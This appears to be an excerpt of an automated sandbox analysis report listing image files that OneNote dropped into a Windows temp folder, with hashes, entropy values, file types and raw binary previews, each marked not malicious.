                                                                                                                                            Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C6A3D216-3962-4D4E-93B7-FF28F7AC7EF9}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C6CF8BAB-4443-4931-A0B7-257A54A0965B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C6F516EA-9A6E-426F-9B04-C9790BE650B6}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):827
                                                                                                                                            Entropy (8bit):7.23139555596658
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                                                            MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                                                            SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                                                            SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                                                            SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C75BD140-9FBD-4E25-B26B-D468DC42F447}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):79656
                                                                                                                                            Entropy (8bit):7.966459570826366
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                                                            MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                                                            SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                                                            SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                                                            SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C7D96F2A-0F4A-401E-8CEA-674E05551775}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):99293
                                                                                                                                            Entropy (8bit):7.9690121496708555
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                                                            MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                                                            SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                                                            SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                                                            SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C7DB98C8-B353-4ED7-BE12-447AEDFD332C}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C7E9CC42-CB20-483C-87A0-F8D02CD27F0E}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C91597D7-76BA-465F-B29E-A0662BDF815F}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3361
                                                                                                                                            Entropy (8bit):7.619405839796034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                                                            MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                                                            SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                                                            SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                                                            SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C9692A36-21E1-4E7A-9EE2-F2E32B535CD7}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{CA3E6463-6E32-4DCC-BEB5-FFAD2D0262D2}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64118
                                                                                                                                            Entropy (8bit):7.742974333356952
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                                                            MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                                                            SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                                                            SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                                                            SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{CAA4C1A8-7B70-40A2-A60B-B43549FB9297}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{CBEB48CA-58D8-4042-839A-66CF9CE5C213}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{CBF33FE5-4C02-4252-9977-BC23D45B92DC}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
